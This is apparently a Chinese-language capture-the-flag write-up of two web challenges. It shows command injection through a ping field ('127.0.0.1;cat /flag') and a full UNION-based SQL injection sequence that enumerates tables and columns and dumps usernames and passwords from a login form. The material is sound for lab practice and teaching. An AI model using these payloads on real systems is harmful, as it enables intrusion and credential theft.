8.exec
先Ping一下127.0.0.1 ,得到回显
输入 127.0.0.1;ls / 获得根目录
看到有flag文件,输入127.0.0.1;cat /flag获取flag
flag{2093b9f0-e3cf-4ab0-beed-bf9f20e772e9}
9.loveSQL
先试用万能密码登录
得到了
尝试MD5解密发现查询不到,那么看看 是否存在注入,首先查看字段数,在url中分别输入
/check.php?username=admin' order by 3%23&password=1
/check.php?username=admin' order by 4%23&password=1
看到当输入/check.php?username=admin' order by 4%23&password=1时存在报错,那么就共有3个字段。
然后用union
查询测试注入点
在url上输入/check.php?username=1' union select 1,2,3%23&password=1
得到回显点位为2和3,查询当前数据库名
输入/check.php?username=1' union select 1,database(),version()%23&password=1
可知数据库名为geek,再进行爆表
输入/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
得到两个表,分别再爆字段。
输入/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
这里是选择的是l0ve1ysq1'这个表
得到三个字段,再爆数据
输入/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
得到flag{1093175d-d9c1-440c-be99-63ca665cc930}